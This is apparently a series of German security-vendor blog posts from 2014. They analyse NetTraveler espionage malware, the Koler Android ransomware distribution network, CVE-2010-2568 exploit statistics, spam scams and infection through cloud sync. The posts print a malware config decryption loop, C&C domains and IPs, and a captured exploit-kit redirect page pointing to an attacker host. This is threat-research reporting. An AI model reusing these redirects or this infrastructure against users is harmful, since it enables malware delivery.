Offensichtlich haben die Entwickler von NetTraveler Maßnahmen ergriffen, in dem Versuch, die Konfiguration der Malware zu verbergen. Glücklicherweise lässt sich die Verschlüsselung recht leicht knacken.

Der Algorithmus sieht folgendermaßen aus:

for (i=0;i<string_size;i++)

decrypted[i]=encrypted[i] - (i + 0xa);



Entschlüsselt erhalten wir die folgende neue Konfigurationsdatei:

nettraveler_4

Problemlos kann man den Command-und-Control-Server (C&C) mit der Adresse “uyghurinfo[.]com” in dem oben stehenden Screenshot herauslesen.

Wir haben mehrere Samples identifiziert, die dieses neue Verschlüsselungsschema benutzen. Es folgt eine Liste aller erkannten C&C-Server:

C&C-ServerIPIP-StandortRegistrar
ssdcru.com103.30.7.77Hong Kong, Albert Heng, Trillion CompanySHANGHAI MEICHENG TECHNOLOGY
uygurinfo.com216.83.32.29United States, Los Angeles, Integen IncTODAYNIC.COM
INC.
samedone.com122.10.17.130Hong Kong, Kowloon, Hongkong Dingfengxinhui Bgp DatacenterSHANGHAI MEICHENG TECHNOLOGY
gobackto.net103.1.42.1Hong Kong, Sun Network (hong Kong) LimitedSHANGHAI MEICHENG TECHNOLOGY
worksware.netN/AN/ASHANGHAI MEICHENG TECHNOLOGY
jojomic.comwas
202.146.219.14
Hong Kong, Sun Network (hong Kong) LimitedSHANGHAI MEICHENG TECHNOLOGY
angellost.netwas 103.17.117.201hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY
husden.comwas 103.30.7.76hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY

Wir empfehlen, alle diese Hosts in der Firewall zu blockieren.

Fazit

In diesem Jahr begehen die Cyberkriminellen, die hinter NetTraveler stehen, ihr 10jähriges „Dienst-Jubiläum“. Obgleich es so aussieht, als wären die frühsten Samples, die uns bekannt sind, im Jahr 2005 kompiliert, gibt es untrügliche Anzeichen dafür, dass die Aktivität der NetTraveler-Verbrecher bereits im Jahr 2004 ihren Anfang nahm.

nettraveler_5

Zehn Jahre lang hat NetTraveler verschiedene Sektoren angegriffen, wobei der Fokus auf Zielen in den Bereichen Diplomatie, Regierung und Militär lag.

nettraveler_6

NetTraveler-Opfer nach Branchen

In letzter Zeit dreht sich das Hauptinteresse der Cyberspionage-Aktivtät um Weltraumforschung, Nano-Technologie, Energieproduktion, Nuklearenergie, Laser, Medizin und Kommunikation.

Die Angriffe auf uigurische und tibetische Aktivisten sind eine Standardkomponente der NetTraveler-Aktivität, und wir gehen davon aus, dass sich das auch in den kommenden 10 Jahren nicht ändern wird.

Organspende mit Lieferung frei Haus


  Tatyana Kulikova        6 August 2014 | 16:03  MSK

Ihr Kommentar  

Ein Liebesversprechen im Tausch gegen die Bezahlung der Reisekosten zum Wohnort des potentiellen Bräutigams ist ein weit verbreiteter Ansatz im betrügerischen Spam. Wesentlich seltenen trifft man in unerwünschten Mitteilungen auf „wohltätige“ Hilfsangebote, die sich dann aber als nicht wirklich kostenlos erweisen.


Ein gewisser Bewohner Odessas namens Alex erklärte in einer Mail, sich gegen eine nicht geringe Entlohnung als Organspender zu verdingen. In dem Schreiben informierte er den Empfänger über seinen Gesundheitszustand („nicht perfekt, aber sehr gut“), seine biometrischen Daten (Größe – 1,74 m, Gewicht – 63 kg) und sogar über seine Blutgruppe. Die Summe, für die der Mann aus Odessa bereit ist, eine Niere oder einen Teil seiner Leber herzugeben, wurde nicht genannt, aber die Hauptbedingung für die Organspende war, dass die Operation in einer europäischen Klinik durchgeführt würde.

Es ist komplett vorhersehbar, dass von Leuten, die auf diese Mitteilung reagieren und sich dazu entschließen, das überaus interessante Angebot anzunehmen, verlangt wird, dem potentiellen Spender eine nicht geringe Geldsumme vorzustrecken. Höchstwahrscheinlich wird der „Odessaner“ um einen Vorschuss auf die Reisekosten nach Europa bitten oder um Geld für die Durchführung zusätzlicher Analysen in qualifizierten Labors, und nach der Überweisung wird er zusammen mit dem erhaltenen Kapital verschwinden. Ehrlichkeit und Geschäfte, die aufgrund von Spam zustande kommen, sind zwei unvereinbare Dinge. Und man sollte erst recht überhaupt gar kein Risiko eingehen, indem man mit Betrügern in Verhandlungen tritt, wenn es dabei um die eigene Gesundheit oder das eigene Leben geht.


Das Stuxnet-Echo: Unerwartete Untersuchungsergebnisse zu Angriffen mit Hilfe von Exploits zu Microsoft-Produkten


   5 August 2014 | 14:00  MSK

Ihr Kommentar  

Wir bei Kaspersky Lab führen regelmäßig Untersuchungen zu einem konkreten Typ von Cyberbedrohungen durch. Zu Beginn dieses Jahres untersuchten wir eingehend die finanziellen Cyberbedrohungen, und Ende letzten Jahres analysierten wir vor dem Hintergrund des Auftauchens immer wieder neuer Sicherheitslücken in Java die Landschaft der Attacken auf die Anwender unserer Produkte, in denen Exploits zu Sicherheitslücken in der populären Software des Unternehmens Oracle zum Einsatz kamen.

In diesem Sommer haben wir einen Artikel mit dem Titel „Windows: Popularität und Sicherheitslücken“ vorbereitet, in dem wir herauszufinden versuchten, ob der Anteil der Anwender, die veraltete Windows-Versionen verwenden, groß ist oder nicht, und wie häufig die Nutzer mit Exploits unter Windows und anderen Microsoft-Produkten konfrontiert werden. Einige dieser Untersuchungsergebnisse erwiesen sich als völlig unerwartet.

Im Sommer 2010 ging die Kunde von der Existenz von Stuxnet um die Welt - einem Computerwurm, der - wie sich später herausstellte – eigens entwickelt wurde, um den Prozess der Urananreicherung in einigen Betrieben im Iran zu sabotieren. Stuxnet wurde zu einer wahren Bombe, die demonstrierte, was Malware in der Lage ist anzurichten, wenn ihr Ziel eng eingegrenzt ist und sie sorgfältig vorbereitet wird. Für die Verbreitung des Wurms wurde ein Exploit zu der Sicherheitslücke CVE-2010-2568 verwendet. Bei dieser Sicherheitslücke handelt es sich um einen Fehler in der Verarbeitung von Shortcuts im Betriebssystem Windows, der es ermöglicht, willkürliche dynamische Bibliotheken ohne Wissen des Anwenders zu laden. Die Schwachstelle betraf Windows XP, Vista, 7, sowie Windows Server 2003 und 2008.

Die ersten Schadprogramme, die diese Sicherheitslücke ausnutzten, wurden im Juli 2010 entdeckt. Unter anderem benutzte der Wurm Sality sie zur Verbreitung des eigenen Codes: Der Wurm generiert verwundbare Shortcuts und verbreitet sie innerhalb des lokalen Netzes. Der User muss nur einen Ordner öffnen, der einen solchen Shortcut enthält, und schon wird das bösartige Programm gestartet. Nach Sality und Stuxnet nutzten auch die bekannten Spionage-Programme Flame und Gauss diese Sicherheitslücke aus.

Microsoft gab ein Sicherheits-Update heraus, das die Schwachstelle noch im Herbst 2010 beseitigte. Ungeachtet dessen registrieren die Detektionssysteme von Kaspersky Lab bis zum heutigen Tag Dutzende Millionen Alarme aufgrund von Exploits, die die Sicherheitslücke CVE-2010-2568 ausnutzen. Tatsächlich wurden innerhalb des Untersuchungszeitraums 50 Millionen Alarme auf über 19 Millionen Computern weltweit registriert.

Überaus aussagekräftig ist auch die Verteilung der Betriebssysteme, auf denen die Alarme auf Exploits zu der LNK-Sicherheitslücke registriert wurden. Der Löwenanteil der Alarme (64,19%) entfiel in den letzten acht Monaten auf XP und nur 27,99% auf Windows 7. Die Produkte von Kaspersky Lab, die die Server-Betriebssysteme Windows Server 2003 und 2008 schützen, melden ebenfalls regelmäßig Detektionen von derartigen Exploits, und zwar 1,58% und 3,99% der Alarme respektive. Die große Zahl von Alarmen, die auf die Nutzer von XP entfallen, zeugt davon, dass auf den meisten dieser Computer entweder keine Schutzlösung installiert ist oder dass eine verwundbare Windows-Version verwendet wird – oder dass beides zutrifft. Die Alarme von den Server-Systemen sind ein Beleg für das Vorhandensein schädlicher Shortcuts in Netzverzeichnissen mit öffentlichem Zugriff, die die Sicherheitslücke CVE-2010-2568 ausnutzen.

Interessant ist auch die geografische Verteilung aller registrierten Alarme aufgrund der Sicherheitslücke CVE-2010-2568.


Geografische Verteilung der Alarme der Produkte von Kaspersky Lab auf Exploits für die Sicherheitslücke CVE-2010-2568 von November 2013 bis Juni 2014

Wie man sieht, sind Vietnam (42,45%), Indien (11,7%) und Algerien (5,52%) nicht nur führend, wenn es um den Nutzungsanteil des veralteten Betriebssystems XP geht, sondern sie liegen auch auf den ersten Plätzen nach Anzahl der Alarme der Schutzprodukte von Kaspersky Lab auf eine der gefährlichsten Sicherheitslücken in Windows, die zum gegenwärtigen Zeitpunkt bekannt ist. Bemerkenswert ist auch, dass den Daten derselben Untersuchung zufolge eben diese drei Länder nach Anteil der Nutzer des veralteten Betriebssystems Windows XP ebenfalls an der Spitze stehen.

Vietnam38.79%
China 27.35%
Indien 26.88%
Algerien24.25%
Italien20.31%
Spanien19.26%
Russische Föderation17.40%
Frankreich 12.04%
Deutschland8.54%
USA4.52%

TOP 10 der Länder mit dem größten Anteil an Anwendern von Windows XP an allen Windows-Anwendern

Es ist kein Wunder, dass die Attacken, die die Sicherheitslücke CVE-2010-2568 ausnutzen, bis heute so verbreitet sind. Die Tatsache, dass so viele Nutzer noch immer verwundbare Systeme verwenden, trägt dazu bei, dass die Exploits zu dieser Sicherheitslücke nach wie vor effektiv sind – und zwar selbst vier Jahre, nachdem ein Patch veröffentlicht wurde, das diese Schwachstelle beseitigt.

Alle weiteren Untersuchungsergebnisse und die vollständige Version des Berichts „Windows: Popularität und Sicherheitslücken“ finden Sie hier.

Spammende Facebook-Freunde aus der Nachbarschaft


  sortloff        1 August 2014 | 10:59  MSK

Ihr Kommentar  

Kürzlich stieß ich auf einige Spam-Ads auf Facebook, die auf den ersten Blick nichts Ungewöhnliches an sich hatten.

Spammer setzen gern auf Social-Engineering-Techniken – sie erstellen gefälschte Profile, treten beliebigen offenen (oder auch geschlossenen) Gruppen bei und teilen Links auf zwielichtige e-commerce-Sites oder betrügerische Umfragen, immer mit irgendwelchen einprägsamen Behauptungen, um die Leser dazu zu bringen, auf den angepriesenen Link zu klicken.

In diesem speziellen Fall liegen die Dinge ein bisschen anders. Die Spammer haben gefakte Profile mit einem netten Bild einer jungen Frau erstellt. Aber wenn man einen näheren Blick auf die Seite über „sie“ wirft, stellt man fest, dass die junge Dame in dem wunderschönen Örtchen Ernersdorf in Bayern lebt (der im Übrigen nicht weit entfernt von der deutschen Niederlassung von Kaspersky Lab liegt). Ich war davon ein wenig überrascht, denn Addison ist ein durchaus ungewöhnlicher Name für eine Person aus einem kleinen bayrischen Ort. Ihrem Profil zufolge ist sie außerdem eigentlich männlich und wurde im September 1978 geboren. Also habe ich mir das Ganze einmal genauer angeguckt.

Es scheint, als hätten die Spammer diesen bayrischen Ort aus strategischen Gründen ausgewählt und dann begonnen, Freundschaftsanfragen an verschiedene Leute aus der Region zu verschicken. Ich selbst stamme auch aus dieser Region, und einige meiner Freunde wurden erfolgreich dazu gebracht, die Freundschaftsanfrage anzunehmen.

Danach passierte mehrere Monate gar nichts. Vor ein paar Tagen begannen diese Spammer – nachdem sie sich einen gewissen Grad an Glaubwürdigkeit verschafft hatten – Fotos mit Werbung für Online-Shop für Sonnenbrillen einer bekannten Marke zu posten, wobei es sich höchstwahrscheinlich um gefälschte Artikel handelt. Um die Verbreitung der Werbebildchen effektiver zu gestalten, taggten die Spammer schließlich ihre „Freunde“ aus der Umgebung.

Wenn man verhindern möchte, dass andere Leute das eigene Profil benutzen, um alle Freunde mit dieser „Technik“ zuzuspammen, kann man die entsprechende Konfiguration bei Facebook bei den Anwendungseinstellungen vornehmen, so wie es getan habe.

Man sollte auch bedenken, dass man gar nicht unbedingt in diese Falle mit den „Freunden aus der Umgebung“ tappen muss, damit man selbst und die eigenen Freunde auf dieses Art zugespamt werden. Wenn Spammer auf irgendeine Weise die Account-Daten der tatsächlichen Freunde stehlen, kann dasselbe passieren wie im hier geschilderten Fall.


Ein Blick hinter das Verteilungsnetzwerk ‘AndroidOS.Koler’


  Global Research and Analysis Team of Kaspersky Lab       28 Juli 2014 | 10:28  MSK

Ihr Kommentar  

Anfang Mai 2014 erwähnte ein IT-Sicherheitsexperte namens Kaffeine erstmals den Schädling Trojan.AndroidOS.Koler.a, ein Erpresser-Programm, das den Bildschirm eines infizierten Gerätes blockiert und ein Lösegeld in Höhe von 100 bis 300 Dollar für die Entsperrung des Gerätes fordert. Es verschlüsselt keine Dateien oder blockiert - außer dem Bildschirm - keine anderen Funktionen auf dem Gerät.

Die Malware zeigt eine lokalisierte Nachricht der Polizei an!

Der Schädling hat maßgeschneiderte Nachrichten für die folgenden Länder zu bieten:

Australien
Belgien
Bolivien
Dänemark
Deutschland
Ecuador
Finnland
Frankreich
Großbritannien
Irland
Italien
Kanada
Lettland
Mexiko
Neuseeland
Niederlande
Norwegen
Österreich
Polen
Portugal
Rumänien
Schweden
Schweiz
Slowakei
Slowenien
Spanien
Tschechische Republik
Türkei
Ungarn
USA

Seit dem 23..Juli ist der mobile Teil der Kampagne unterbrochen und die Command- und Control-Server begannen “Uninstall”-Anfragen an die Opfer zu versenden.

In diesem Blogpost geht es weniger um die mobile Anwendung selbst – einige Details werden wir am Ende des Beitrags beleuchten – als vielmehr um seine Verteilungsinfrastruktur. Ein ganzes Netzwerk von schädlichen Pornosites, verbunden mit einem Traffic-Richtungssystem, das das Opfer auf verschiedene Payloads umleitet und dabei nicht nur mobile Geräte, sondern einfach jeden Besucher angreift. Eingeschlossen sind Umleitungen auf Browser-basierte Erpresserprogramme – Ransomware – und auf etwas, das wir für ein “Angler”-Exploit-Kit-Verteilungsnetzwerk halten.

Das unten stehende Diagramm zeichnet ein umfassenderes Bild der hier verwendeten Infrastruktur.

Die wichtigsten Untersuchungsergebnisse lassen sich folgendermaßen zusammenfassen:

  • Verteilung:        TDS (Traffic Distribution System)
  • Hauptkontroller:        video-sartex.us (TDS Controller)
  • Schädliche Porno-Websites (Redirector):        49 Domains gefunden
  • Exploit-Kit Websites:        700+ URLs (200+ Domains)
  • Browser-basierte Bildschirm-Sperrdomains:        49 Domains gefunden
  • Mobile Infektionsdomain:        video-porno-gratuit.eu
  • Mobil C2:        policemobile.biz.
  • Traffic:        Fast 200.000 Besucher der mobilen Infektionsdomain
  • 80% der Besucher stammen aus den USA

Die Nutzung eines Porno-Netzwerks für diese „Polizei“-Erpressersoftware ist kein Zufall: Die Opfer fühlen sich viel eher schuldig, wenn sie derartigen Content besuchen, und sie bezahlen daher auch eher die angeblich von den Behörden geforderte Strafe. Dieser psychologische Faktor kann den feinen Unterschied ausmachen zwischen einer gescheiterten und einer erfolgreichen Kampagne.

Unter Berücksichtigung der schädlichen mobilen Anwendung haben wir verschiedene APKs mit demselben Verhalten aufgespürt. Einige von ihnen (die noch nicht über dieses schädliche Netzwerk verbreitet werden) haben interessante Namen, wie z.B. PronHub.com.Apk, whatsapp.apk oder updateflash.apk.

Das verleitet zu der Annahme, dass die Angreifer ihre Kampagne in nächster Zukunft ausweiten könnten.

Verteilung der mobilen Payload

Die mobile Infektion wird ausgelöst, wenn der Nutzer bestimmte Porno-Sites mit einem Android-Gerät besucht. Diese Sites sind Teil eines Verteilungsnetzwerks, das eigens für diese Kampagne erstellt wurde und die Opfer zu einer Landing-Page umleitet, die eine APK-Datei mit der Bezeichnung animalporn.apk enthält.

Alle diese Porno-Sites in der Kampagne leiten ihren Traffic auf denselben Server um: hxxp://video-porno-gratuit.eu. Diese Domain hostet die schädliche APK.

Sobald der Nutzer die Website besucht, leitet sie ihn automatisch auf die schädliche App um. Der User muss dann den Download und die Installation der Anwendung auf seinem Gerät bestätigen.

Wir konnten Statistiken abrufen, die die geografische Verteilung dieser schädlichen Websites zeigen:

Gemäß denselben Statistiken begann die Kampagne und erreichte den Höhepunkt ihrer Aktivität im April 2014.

Redirectors: Das schädliche Porno-Netzwerk

Bei den pornografischen Sites des Netzwerks handelt es sich nicht um kompromittierte Sites. Sie sehen alle gleich aus, haben dieselbe HTML-Infrastruktur und stellen nicht ihr eigenes Porno-Material bereit.

Wir konnten insgesamt 48 Domains in diesem Porno-Umleitungsnetzwerk identifizieren.

Fast alle in dieser Infrastruktur benutzten Websites wurden unter Verwendung derselben Schablone erstellt – in vielen Fällen waren es Mustervorlagen von den legitimen Sites Tubewizardpro und Webloader für die externen Ressourcen.

Der gesamte Content (meist Videos und Bilder) auf diesen Pornosites wird mit Hilfe von Webloader von externen Quellen geladen.

Grundsätzlich leiten alle Porno-Sites auf die „Kontroll“-Domain videosartex.us um

Videosartex.us führt dann einen Redircet durch, der auf dem Parameter in der URL, dem Referrer, dem User-Agent und der geografischen Position der IP des Besuchers basiert.

Gehört die IP zu einem der 30 betroffenen Länder und der User-Agent gehört zu einem Android-Gerät, so wird der Besucher auf die APK bei video-porno-gratuit.eu umgeleitet.

In anderen Fällen wird der Nutzer entweder auf eine Porno-Site in dem Netzwerk, einen Bildschirmblockierer oder ein Exploit-Kit umgeleitet. Die Angreifer verwenden das Keitaro TDS (Traffic Distribution System) zur Umleitung der Anwender.

Nicht-mobile Payloads

Während unserer Analyse stellten wir fest, dass einige Domains nicht mobilen Opfern Ransomware-bezogene Pop-Ups anzeigen. Diese zusätzlichen Server werden benutzt, wenn der Kontroller (videosartex) eine der zwei folgenden Bedingungen feststellt:

  • Die Anfrage enthält keinen User-Agent des Internet Explorer.
  • Die Anfrage stammt aus einem der 30 betroffenen Länder, enthält jedoch keinen Android-User-Agent.

In diesem Fall wird das Opfer auf irgendeine der Browser-Ransomware-Websites weitergeleitet, während genau derselbe Sperrbildschirm wie im Fall von mobilen Geräten auf dem Computer des Opfers angezeigt wird. Es gibt in diesem Fall keine Infektion, lediglich ein Pop-up, das eine Sperrbild-Schablone anzeigt.

Die folgenden Bilder sind Beispiele für die Header, die in den Ransomware-Pop-ups benutzt werden:



Exploit-Kits

Die bei dieser Kampagne verwendete Umleitungsinfrastruktur beinhaltete eine finale Überraschung – sie leitet die Besucher, die den Internet Explorer verwenden, auf Sites, die das Angler-Exploit-Kit hosten, das Exploits für Silverlight, Adobe Flash und Java enthält.

Hier ein Beispiel für eine solche Umleitung:


<html>

<head>

<meta http-equiv="REFRESH" content="1; URL='hxxp://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php/'">

<script type="text/javascript">window.location = "http://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php";</script>

</head>

<body>

The Document has moved <a href="hxxp://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php">here</a>

</body>

</html>

Wir entdeckten über 200 Domains, die zur Unterbringung dieses Exploit-Kits benutzt werden.

Während unserer Analyse war der Exploit-Code nicht voll funktionsfähig und lieferte keinerlei Payload.

Fazit

Ransomware für mobile Geräte tauchte in fast jeder Prognose für das Jahr 2014 auf. Wir haben es hier nicht mit den raffiniertesten Schadfamilien zu tun, wie etwa Cryptolocker für Windows. Die Erpresserprogramme sind recht einfach gestrickt, allerdings reichen sie aus, um dem Opfer Verdruss zu bereiten.

Am interessantesten ist das Verteilungsnetzwerk, das in dieser Kampagne zum Einsatz kommt. Dutzende von automatisch generierten Websites leiten den Traffic zu einem zentralen Netzknoten, wo die Nutzer wieder umgeleitet werden. In Abhängigkeit von verschiedenen Bedingungen kann der zweite Redirect auf eine schädliche Android-Anwendung, zu einer Browser-basierten Ransomware oder zu einer Website mit dem Angler Exploit Kit führen.

Unserer Meinung nach zeigt diese Infrastruktur sehr deutlich, wie gut organisiert und gefährlich solche Kampagnen sind, die aktuell hauptsächlich - aber nicht ausschließlich - Android-User attackieren. Die Angreifer können dank vollständiger Automatisierung schnell ähnliche Infrastrukturen aufbauen, indem sie die Payload ändern oder andere Nutzer angreifen. Die Kriminellen haben zudem eine Reihe von Wegen gefunden, ihr Einkommen aus den Attacken in einem echten Multi-Geräte-Schema in Bares zu verwandeln.

Schwerlast-Trojaner mit Lieferung frei Haus


  Tatyana Kulikova       15 Juli 2014 | 16:05  MSK

Ihr Kommentar  

Gefälschte Mails, die im Namen bekannter Geschäfte verschickt werden, finden sich häufig im Spam-Traffic. In der Regel nutzen Cyberkriminellen zu solchen Zwecken die Namen von Online-Shops aus, doch es gibt auch Ausnahmen. Vor kurzem registrierten wir eine Versendung in (fehlerhafter) deutscher Sprache, in der der Empfänger aufgefordert wurde, eine ZIP-Datei zu öffnen, in der sich angeblich eine Rechnung und „andere wichtige Unterlagen“ von dem bekannten schwedischen Möbelhersteller IKEA befanden.

Allerdings verbargen sich im Archiv nicht die versprochenen Dokumente, sondern der Programm-Downloader Andromeda, der seinerseits den Schädling Trojan-PSW.Kegotip lud. Dieser Trojaner ist auf den Diebstahl persönlicher Informationen spezialisiert, unter anderem Logindaten und Passwörter.

Der aufmerksame Anwender kann problemlos ein gefaktes Schreiben von einer echten Benachrichtigung unterscheiden: Die faulen Spammer machten sich noch nicht einmal die Mühe, ihre Fälschung der Glaubwürdigkeit halber ein wenig auszustaffieren, z.B. mit dem Logo des Möbelhauses oder einer persönlichen Anrede, die typisch für IKEA ist.


Löcher im Schutz von Unternehmensnetzwerken: Cloud-Services


  Kirill Kruglov         9 Juli 2014 | 15:00  MSK

Ihr Kommentar  

Zu den am weitesten verbreiteten „Einsatzgebieten“ von Cloud-Services gehören: das Speichern von Scans des Reisepasses oder anderen persönlichen Dokumenten; die Synchronisierung von Datenbanken mit Passwörtern, Kontakten, Mails; das Erstellen von Websites; das Speichern von Quellcode-Versionen usw. Als der Cloud-Speicherdienst Dropbox öffentlich mitteilte, dass er eine Sicherheitslücke im Linkgenerator geschlossen habe, wurde im Internet wieder einmal eifrig darüber diskutiert, wie wichtig es ist, vertrauliche Daten zu verschlüsseln, bevor man sie auf irgendeiner Ressource ablegt - selbst wenn diese privat ist. Die Datenverschlüsselung (FLE) gewährleistet tatsächlich den Schutz vertraulicher Daten in der Cloud, selbst wenn Sicherheitslücken in der Kontrolle des Zugriffs auf Anwenderdokumente in dem einen oder anderen Cloud-Dienst entdeckt werden.

Es mag nun der Eindruck entstehen, dass man jedes Risiko vermeiden kann, wenn man entweder erst gar keine geheimen Daten in der Cloud ablegt oder diese verschlüsselt. Ist das tatsächlich so? Wie sich herausgestellt hat, nicht wirklich.

Im Internet findet man häufig Ratschläge zur „effizienten Nutzung von Filehosting-Diensten in der Cloud“, beispielsweise Anweisungen zur entfernten Steuerung des Computers, Beobachten des Computers während der eigenen Abwesenheit, Steuerung von torrent-Downloads und vieles mehr. Mit anderen Worten: Die Nutzer schaffen selbst alle nur erdenklichen Löcher, die auch von Trojanern, Würmern und vor allem Hackern mit Leichtigkeit ausgenutzt werden können, insbesondere wenn es um zielgerichtete Attacken geht.

Wir haben uns eine Frage gestellt: Wie groß ist das Risiko einer Infektion eines Unternehmensnetzwerks über einen Cloud-Service?

Auf der Black Hat 2013 referierte Jacob Williams, Chief Scientist der CSRgroup Computer Security Consultants, über die Nutzung von Dropbox zum Eindringen in ein Unternehmensnetzwerk. Im Laufe der Durchführung eines in Auftrag gegebenen Penetrationstests benutzte Jacob den zarten Dropbox-Client, der auf einem Notebook installiert war, das sich außerhalb des Unternehmensnetzwerks befand, um Schadsoftware auf Geräten innerhalb des Netzes zu verbreiten.

Zunächst infizierte Jacob mit Hilfe von Phishing das Notebook eines Mitarbeiters. Daraufhin schleuste er schädliche Skripte in Dokumente ein, die in einem „Cloud“-Ordner des Notebooks gespeichert waren. Dropbox aktualisierte die infizierten Dokumente automatisch auf allen Geräten, die mit dem Account des Anwenders in Verbindung standen (Synchronisation). Diesbezüglich steht Dropbox nicht allein da, denn die Funktion der automatischen Synchronisation ist in allen populären Anwendungen für den Zugriff auf Cloud-Filehosting-Dienste vorhanden, darunter Onedrive (alias Skydrive), Google Disk, Yandex Disk usw.

Wenn der Anwender das infizierte Dokument auf seinem Arbeitscomputer innerhalb des Unternehmensnetzwerks öffnete, installierten die in das Dokument eingeschleusten Skripte im System den Backdoor DropSmack, den Jacob speziell für diesen Pen-Test entwickelt hatte. Wie der Name vermuten lässt, besteht die Schlüsselfunktion von DropSmack in der Ausnutzung des Cloud-Dateispeichers Dropbox als Kanal zur Steuerung des Backdoors und zur Übermittlung von Unternehmensdokumenten durch die Unternehmens-Firewall hindurch nach draußen.






Jacob Williams‘ Experiment-Schema

Die Eindringungsmethode in das Unternehmensnetzwerk, die von Jacob im Rahmen des Pen-Tests eingesetzt wurde, überrascht durch ihre Einfachheit. Das ist wirklich eine eindeutige Lücke!

Wir wollten nun herausfinden, ob echte Cyberkriminelle tatsächlich Dropbox, OneDrive, Yandex Disk und Google Disk zur Verbreitung von Schadcode nutzen. Aufgrund der Informationen aus dem KSN über die Detektionen von Schädlingen, die in „Cloud“-Ordnern auf den Computern der Nutzer von Kaspersky Lab-Produkten gefunden wurden, stellten wir fest, dass solche Infektionen bei nur sehr wenigen Anwendern registriert wurden: Im Mai dieses Jahres hatten es lediglich 8.700 Personen mit einer Infektion eines „Cloud“-Ordners zu tun. Bei den Heimanwendern von Kaspersky Lab-Produkten machten die Schadprogramme dieser Art 0,42% aller Detektionen aus, bei den Anwendern von Unternehmensprodukten waren 0,24%.

Ein nicht ganz unwichtiges Detail sollte an dieser Stelle unbedingt erwähnt werden: Sobald der Schädling von einem Gerät in die Cloud gelangt ist, laden alle mit dem infizierten Account verbundenen Clients das Schadprogramm selbst auf ihr Gerät, und obendrein auch noch via HTTPS. Selbst wenn ein Antivirenprogramm den Befall auf einem der Geräte bemerkt und den Schädling direkt im Synchronisierungsordner löscht, so wird die Cloud-Anwendung – den Pflichten des Dienstes gemäß – gegen die sich abzeichnende Desynchronisierung angehen und den Schädling endlos aus der Cloud laden – wieder und wieder.

Unseren Daten zufolge gelangen in etwa 30% der Schadprogramme, die in Cloud-Ordnern auf Heimrechnern gefunden werden, über Synchronisierungsmechanismen auf die Computer! Bei Unternehmensanwendern liegt dieser Wert bei 50%. So führt der Mechanismus, den der Demonstrationsschädling von Jacob Williams verwendete, auch im wahren Leben zu Infektionen. Glücklicherweise haben wir bisher noch keine zielgerichtete Attacke unter Ausnutzung von Cloud-basierten Dateispeicherdiensten beobachten können.

Unter der schädlichen Software, die wir in den Cloud-Ordnern auf den Computern der Nutzer gefunden haben, herrschen Dateien der folgenden Formate vor: Win32, MSIL, VBS, PHP, JS, Excel, Word, Java. Erwähnenswert ist auch, dass zwischen Unternehmensanwendern und Heimanwendern ein kleiner Unterschied besteht: Bei den Erstgenannten finden sich häufiger infizierte MS Office-Dateien, bei den Letztgenannten sind es eher einmalige Schädlinge, und zwar bösartige Android-Apps.

TOP 10 der Schadprogramme:

 

HeimanwenderUnternehmensanwender
1Email-Worm.Win32.Runouce.bEmail-Worm.Win32.Brontok.dam.a
2Email-Worm.Win32.Brontok.qVirus.Win32.Sality.gen
3not-a-virus:AdWare.Win32.RivalGame.krVirus.Win32.Tenga.a
4Virus.Win32.Nimnul.aTrojan-Dropper.VBS.Agent.bp
5Trojan-Clicker.HTML.IFrame.agaTrojan.Win32.Agent.ada
6Exploit.Win32.CVE-2010-2568.genTrojan.Win32.MicroFake.ba
7Virus.Win32.Sality.genExploit.Win32.CVE-2010-2568.gen
8Worm.Win32.AutoRun.dtbvWorm.Win32.AutoRun.dtbv
9Trojan-Dropper.VBS.Agent.bpTrojan.Win32.Qhost.afes
10Trojan.Win32.Genome.vqzzVirus.Win32.Nimnul.a

Zumeist verwenden Virenautoren Cloud-Speicher gar nicht als Plattform zur Verbreitung, sondern vielmehr zum Hosting von Schadprogrammen – im Laufe unserer Untersuchungen sind wir nicht auf einen einzigen Wurm oder Backdoor gestoßen (DropSmack einmal ausgenommen), die es speziell auf Dateispeicher in der Cloud abgesehen hatten. Natürlich sind auch die Services selbst sehr bemüht, gegen Schadprogramme anzugehen, die einen freien Platz in der Cloud besetzen. Zudem wirkt sich das Hosting von Malware negativ auf den Ruf des Dienstes aus, auch wenn Cloud-Services rein formal keine Verantwortung dafür übernehmen, welche Dateien ihre Kunden in den Speicher laden. Offenbar verschlingt das Scannen aller in der Cloud befindlichen Dateien zu viele Ressourcen, die die Dienste gewinnbringender für die Speicherung von Daten nutzen können.

Die Untersuchung hat uns in erster Linie gezeigt, dass das Risiko einer Infektion über einen Cloud-Speicher relativ gering ist – im Laufe eines Jahres ist einer von eintausend Unternehmensanwendern, die Cloud-Services nutzen, einem Infektionsrisiko ausgesetzt. Man sollte allerdings bedenken, dass in manchen Fällen sogar eine einzige Infektion eines Computers in einem Unternehmensnetzwerk zu erheblichen Verlusten führen kann.

Mögliche Maßnahmen zum Schutz von Unternehmensnetzwerken:


  • Schrauben in der Firewall/IDS anziehen, den Zugriff auf die Server bekannter Services blockieren. Ein großer Nachteil dieses Ansatzes liegt in dem hohen Ressourcenverbrauch, denn man muss sorgfältig darauf achten, ob neue Kandidaten in der „Schwarzen Liste“ aufgetaucht sind.

  • Installation einer multifunktionalen Security Suite, die folgende Komponenten und Funktionen beinhaltet: heuristischer und verhaltensbasierter Antivirus, Zugriffsbeschränkung (HIPS), Kontrolle der Arbeit des Betriebssystems (System Watcher oder Hypervisor), Schutz vor Ausnutzung von Sicherheitslücken usw. Alle diese Features sollten dabei sorgfältig konfiguriert werden.

  • Da selbst eine moderne Security Suite mit allem Drum und Dran eine APT durchlassen kann, sollte man der Technologie „Anwendungskontrolle“ große Beachtung schenken (im Modus „Standardmäßig verboten“). Das ist wohl eins der zuverlässigsten Mittel, das das Blockieren jeder beliebigen unerwünschten Software ermöglicht (unter anderem solche, die im Rahmen von zielgerichteten Attacken verbreitet werden). Die komplexeste Aufgabe bei der Integration der Anwendungskontrolle besteht darin, die entsprechenden Regeln zu konfigurieren, damit alle erlaubten Anwendungen problemlos ausgeführt und aktualisiert werden. Zu diesem Zweck haben die Hersteller von Produkten mit der Funktion Anwendungskontrolle spezielle Tools entwickelt – Software-Updatefunktionen über vertrauenswürdige Aktualisierungsprogramme aus der Weißen Liste, inklusive alle möglichen System- und Anwendungsdateien, Zugriff auf die großen Cloud-Services und auf Informationsdatenbanken aller nur erdenklicher sauberer Software.

